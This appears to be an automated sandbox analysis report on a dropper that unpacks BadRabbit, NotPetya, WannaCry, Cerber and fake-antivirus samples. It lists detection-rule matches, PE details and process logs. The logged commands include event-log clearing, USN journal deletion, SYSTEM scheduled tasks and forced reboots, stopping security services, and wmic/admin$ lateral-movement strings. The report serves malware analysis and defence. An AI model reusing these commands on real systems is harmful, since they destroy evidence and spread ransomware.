          Source: 22.2.rundll32.exe.b25460.0.unpack, type: UNPACKEDPEMatched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 18.2.Endermanch@BadRabbit.exe.c4fae0.0.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 18.0.Endermanch@BadRabbit.exe.1300000.1.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 22.3.rundll32.exe.ba3008.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
          Source: 22.2.rundll32.exe.4530000.2.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 22.2.rundll32.exe.4530000.2.unpack, type: UNPACKEDPEMatched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 57.0.Endermanch@InfinityCrypt.exe.3531cc.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_InfinityLock author = ditekSHen, description = Detects InfinityLock ransomware
          Source: 0000002F.00000000.420217130.00007FF769B1E000.00000008.00000001.01000000.0000001D.sdmp, type: MEMORYMatched rule: mimikatz author = Benjamin DELPY (gentilkiwi), description = mimikatz, tool_author = Benjamin DELPY (gentilkiwi)
          Source: 00000017.00000000.387505023.0000000000448000.00000020.00000001.01000000.00000013.sdmp, type: MEMORYMatched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
          Source: 0000002F.00000000.419388930.00007FF769B1E000.00000008.00000001.01000000.0000001D.sdmp, type: MEMORYMatched rule: mimikatz author = Benjamin DELPY (gentilkiwi), description = mimikatz, tool_author = Benjamin DELPY (gentilkiwi)
          Source: 00000016.00000003.408744646.00000000045A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93 date = 2017-10-24, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Christiaan Beek, description = Bad Rabbit Ransomware, source = https://pastebin.com/Y7pJv3tK, reference = BadRabbit
          Source: 0000002F.00000002.430889816.00007FF769B1E000.00000004.00000001.01000000.0000001D.sdmp, type: MEMORYMatched rule: mimikatz author = Benjamin DELPY (gentilkiwi), description = mimikatz, tool_author = Benjamin DELPY (gentilkiwi)
          Source: 00000017.00000000.390806743.0000000000448000.00000020.00000001.01000000.00000013.sdmp, type: MEMORYMatched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
          Source: 00000017.00000000.383647145.0000000000448000.00000020.00000001.01000000.00000013.sdmp, type: MEMORYMatched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
          Source: 00000017.00000000.392692750.0000000000448000.00000020.00000001.01000000.00000013.sdmp, type: MEMORYMatched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
          Source: 0000002F.00000000.421202645.00007FF769B1E000.00000008.00000001.01000000.0000001D.sdmp, type: MEMORYMatched rule: mimikatz author = Benjamin DELPY (gentilkiwi), description = mimikatz, tool_author = Benjamin DELPY (gentilkiwi)
          Source: Process Memory Space: rundll32.exe PID: 4124, type: MEMORYSTRMatched rule: fe_cpe_ms17_010_ransomware date = 2017-06-27, author = ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick, description = probable petya ransomware using eternalblue, wmic, psexec, version = 1.1, reference = https://www.fireeye.com/blog/threat-research/2017/06/petya-ransomware-spreading-via-eternalblue-exploit.html
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe, type: DROPPEDMatched rule: MALWARE_Win_InfinityLock author = ditekSHen, description = Detects InfinityLock ransomware
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exe, type: DROPPEDMatched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
          Source: C:\Windows\dispci.exe, type: DROPPEDMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: C:\Windows\dispci.exe, type: DROPPEDMatched rule: sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93 date = 2017-10-24, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Christiaan Beek, description = Bad Rabbit Ransomware, source = https://pastebin.com/Y7pJv3tK, reference = BadRabbit
          Source: C:\Windows\cscc.dat, type: DROPPEDMatched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
          Source: C:\Users\user\Desktop\Fantom.exe, type: DROPPEDMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: C:\Users\user\Desktop\Endermanch@Petya.A.exe, type: DROPPEDMatched rule: Petya_Ransomware date = 2016-03-24, author = Florian Roth, description = Detects Petya Ransomware, reference = http://www.heise.de/newsticker/meldung/Erpressungs-Trojaner-Petya-riegelt-den-gesamten-Rechner-ab-3150917.html, hash = 26b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739
          Source: C:\Users\user\Desktop\Endermanch@Petya.A.exe, type: DROPPEDMatched rule: Ransom_Petya author = CCN-CERT, description = Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015, version = 1.0
          Source: C:\Users\user\Desktop\Endermanch@BadRabbit.exe, type: DROPPEDMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: C:\Users\user\Desktop\Endermanch@WannaCrypt0r.exe, type: DROPPEDMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
          Source: C:\Users\user\Desktop\Endermanch@WannaCrypt0r.exe, type: DROPPEDMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
          Source: C:\Users\user\Desktop\Endermanch@WannaCrypt0r.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeFile deleted: C:\Windows\__tmp_rar_sfx_access_check_19404687Jump to behavior
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeFile created: C:\Windows\__tmp_rar_sfx_access_check_19404687Jump to behavior
          Source: Endermanch@WannaCrypt0r.exe.0.drStatic PE information: Resource name: XIA type: Zip archive data, at least v2.0 to extract, compression method=deflate
          Source: Endermanch@InternetSecurityGuard.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
          Source: Endermanch@InternetSecurityGuard.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (GUI) x86-64, for MS Windows
          Source: Endermanch@SecurityScanner.exe.0.drStatic PE information: Resource name: RT_RCDATA type: DOS executable (COM, 0x8C-variant)
          Source: Endermanch@SecurityScanner.exe.0.drStatic PE information: Resource name: RT_RCDATA type: COM executable for DOS
          Source: Endermanch@VAV2008.exe.0.drStatic PE information: Resource name: RT_DIALOG type: DOS executable (COM, 0x8C-variant)
          Source: Endermanch@PolyRansom.exe.0.drStatic PE information: No import functions for PE file found
          Source: Endermanch@ViraLock.exe.0.drStatic PE information: No import functions for PE file found
          Source: 07bb0738.exe, 00000000.00000000.248716788.0000022E4EE58000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamed.exe$ vs 07bb0738.exe
          Source: 07bb0738.exeBinary or memory string: OriginalFilenamed.exe$ vs 07bb0738.exe
          Source: 07bb0738.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: Endermanch@NoMoreRansom.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: Endermanch@AntivirusPro2017.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: Endermanch@HappyAntivirus.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: Endermanch@Movie.mpeg.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: Endermanch@SecurityScanner.exe.0.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
          Source: Fantom.exe.0.drStatic PE information: Section: .rsrc ZLIB complexity 0.9916272410358565
          Source: Endermanch@Xyeta.exe.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9942863805970149
          Source: Endermanch@InternetSecurityGuard.exe.0.drStatic PE information: Section: .rdata ZLIB complexity 1.0416666666666667
          Source: Endermanch@SecurityCentral.exe.0.drStatic PE information: Section: .rsrc ZLIB complexity 0.9893345463538722
          Source: Endermanch@SecurityDefender.exe.0.drStatic PE information: Section: .data ZLIB complexity 0.9999101413973384
          Source: Endermanch@SecurityScanner.exe.0.drStatic PE information: Section: ZLIB complexity 1.0005126953125
          Source: Endermanch@SecurityScanner.exe.0.drStatic PE information: Section: ZLIB complexity 1.0005296610169492
          Source: Endermanch@SecurityScanner.exe.0.drStatic PE information: Section: ZLIB complexity 1.021484375
          Source: Endermanch@SecurityScanner.exe.0.drStatic PE information: Section: .rsrc ZLIB complexity 0.9944190347101134
          Source: Endermanch@VAV2008.exe.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9890534156976745
          Source: 07bb0738.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\antivirus-platinum.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\BadRabbit.zipJump to behavior
          Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@113/217@112/100
          Source: C:\Users\user\Desktop\07bb0738.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Birele.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 15_2_004096AF GetModuleHandleA,FindResourceA,15_2_004096AF
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeFile created: C:\Program Files (x86)\antiviruspc2009
          Source: Endermanch@SecurityCentral.exe.0.drBinary or memory string: .vbp.1\deVBFSG_new\deVBFSG.vbpP
          Source: rundll32.exe, 00000016.00000002.493753768.000000000453D000.00000002.00001000.00020000.00000000.sdmp, rundll32.exe, 00000016.00000002.465407498.0000000000B0A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5clDuVFr5sQxZ+feQlVvZcEK0k4uCSF5SkOkF9A3tR6O/xAt89/PVhowvu2TfBTRsnBs83hcFH8hjG2V5F5DxXFoSxpTqVsR4lOm5KB2S8ap4TinG/GN/SVNBFwllpRhV/vRWNmKgKIdROvkHxyALuJyUuCZlIoaJ5tB0YkATEHEyRsLcntZYsdwH1P+NmXiNg2MH5lZ9bEOk7YTMfwVKNqtHaX0LJOyAkx4NR0DPOFLDQONW9OOhZSkRx3V7PC3Q29HHhyiKVCPJsOW1l1mNtwL7KX+7kfNe0CefByEWfSBt1tbkvjdeP2xBnPjb3GE1GA/oGcGjrXc6wV8WKsfYQIDAQAB.3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.\AppData\ProgramData\Program Files\Windows.encrypted*..Readme.txt%s-h-f%dkernel32.dllIsWow64Process\\.\pipe\%ws"%ws" %wsiphlpapi.dllGetExtendedTcpTable%u.%u.%u.%uTERMSRV/127.0.0.1localhost0.0.0.0\rundll32.exe%ws C:\Windows\%ws,#1 %wsSeTcbPrivilegeSeShutdownPrivilegeSeDebugPrivilege%08X%08X/c %ws%wswevtutil cl %ws & SetupSystemSecurityApplicationfsutil usn deletejournal /D %c:schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "%ws" /ST %02d:%02d:00schtasks /Delete /F /TN drogon255.255.255.255%u.%u.%u.%uC:\Windows\System32\rundll32.exe "C:\Windows\",#2 \\%s\admin$\\%ws\admin$\%wsprocess call create "C:\Windows\System32\rundll32.exe \"C:\Windows\%s\" #1 "wbem\wmic.exe%ws WaitForMultipleObjectskernel32
          Source: rundll32.exe, 00000016.00000003.408744646.00000000045A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5clDuVFr5sQxZ+feQlVvZcEK0k4uCSF5SkOkF9A3tR6O/xAt89/PVhowvu2TfBTRsnBs83hcFH8hjG2V5F5DxXFoSxpTqVsR4lOm5KB2S8ap4TinG/GN/SVNBFwllpRhV/vRWNmKgKIdROvkHxyALuJyUuCZlIoaJ5tB0YkATEHEyRsLcntZYsdwH1P+NmXiNg2MH5lZ9bEOk7YTMfwVKNqtHaX0LJOyAkx4NR0DPOFLDQONW9OOhZSkRx3V7PC3Q29HHhyiKVCPJsOW1l1mNtwL7KX+7kfNe0CefByEWfSBt1tbkvjdeP2xBnPjb3GE1GA/oGcGjrXc6wV8WKsfYQIDAQAB.3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.\AppData\ProgramData\Program Files\Windows.encrypted%lS OK
          Source: C:\Windows\302746537.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\A00.tmp\302746537.bat" "
          Source: 07bb0738.exeReversingLabs: Detection: 64%
          Source: 07bb0738.exeVirustotal: Detection: 62%
          Source: 07bb0738.exeMetadefender: Detection: 24%
          Source: C:\Users\user\Desktop\07bb0738.exeFile read: C:\Users\user\Desktop\07bb0738.exe:Zone.IdentifierJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\07bb0738.exe "C:\Users\user\Desktop\07bb0738.exe"
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
          Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
          Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
          Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
          Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
          Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k netsvcs -p
          Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc
          Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
          Source: C:\Users\user\Desktop\07bb0738.exeProcess created: C:\Users\user\Desktop\07bb0738.exe "C:\Users\user\Desktop\07bb0738.exe"
          Source: C:\Users\user\Desktop\07bb0738.exeProcess created: C:\Users\user\Desktop\Endermanch@Antivirus.exe "C:\Users\user\Desktop\Endermanch@Antivirus.exe"
          Source: C:\Users\user\Desktop\07bb0738.exeProcess created: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe "C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe"
          Source: C:\Users\user\Desktop\07bb0738.exeProcess created: C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exe "C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exe"
          Source: C:\Users\user\Desktop\07bb0738.exeProcess created: C:\Users\user\Desktop\Endermanch@AnViPC2009.exe "C:\Users\user\Desktop\Endermanch@AnViPC2009.exe"
          Source: C:\Users\user\Desktop\07bb0738.exeProcess created: C:\Users\user\Desktop\Endermanch@BadRabbit.exe "C:\Users\user\Desktop\Endermanch@BadRabbit.exe"
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeProcess created: C:\Windows\302746537.exe "C:\WINDOWS\302746537.exe"
          Source: C:\Users\user\Desktop\07bb0738.exeProcess created: C:\Users\user\Desktop\Endermanch@Birele.exe "C:\Users\user\Desktop\Endermanch@Birele.exe"
          Source: C:\Users\user\Desktop\Endermanch@BadRabbit.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Endermanch@BadRabbit.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
          Source: C:\Users\user\Desktop\07bb0738.exeProcess created: C:\Users\user\Desktop\Endermanch@Cerber5.exe "C:\Users\user\Desktop\Endermanch@Cerber5.exe"
          Source: C:\Windows\302746537.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\A00.tmp\302746537.bat" "
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeProcess created: C:\Program Files (x86)\antiviruspc2009\avpc2009.exe "C:\Program Files (x86)\antiviruspc2009\avpc2009.exe"
          Source: C:\Users\user\Desktop\Endermanch@Birele.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM explorer.exe
          Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 /s c:\windows\comctl32.ocx
          Source: C:\Users\user\Desktop\07bb0738.exeProcess created: C:\Users\user\Desktop\Endermanch@DeriaLock.exe "C:\Users\user\Desktop\Endermanch@DeriaLock.exe"
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Delete /F /TN rhaegal
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 /s c:\windows\mscomctl.ocx
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN rhaegal
          Source: C:\Users\user\Desktop\07bb0738.exeProcess created: C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exe "C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exe"
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 2277809790 && exit"
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\system32\netsh.exe advfirewall set allprofiles state on
          Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\07bb0738.exeProcess created: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exe "C:\Users\user\Desktop\Endermanch@HappyAntivirus.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 2277809790 && exit"
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\system32\netsh.exe advfirewall reset
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 15:17:00
          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /C Start "" "C:\Windows\dispci.exe" -id 2277809790 && exit
          Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\586F.tmp "C:\Windows\586F.tmp" \\.\pipe\{9D54B529-EEEC-45A5-9DC8-4D8B7F723465}
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 15:17:00
          Source: C:\Windows\586F.tmpProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\antivirus-platinum.exe c:\windows\antivirus-platinum.exe
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe attrib +h c:\windows\antivirus-platinum.exe
          Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
          Source: C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exeProcess created: C:\Users\user\AppData\Local\6AdwCleaner.exe "C:\Users\user\AppData\Local\6AdwCleaner.exe"
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvc
          Source: C:\Users\user\Desktop\07bb0738.exeProcess created: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe "C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe"
          Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\07bb0738.exeProcess created: C:\Users\user\Desktop\07bb0738.exe "C:\Users\user\Desktop\07bb0738.exe" Jump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess created: C:\Users\user\Desktop\Endermanch@Antivirus.exe "C:\Users\user\Desktop\Endermanch@Antivirus.exe" Jump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess created: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe "C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe" Jump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess created: C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exe "C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exe" Jump to behavior
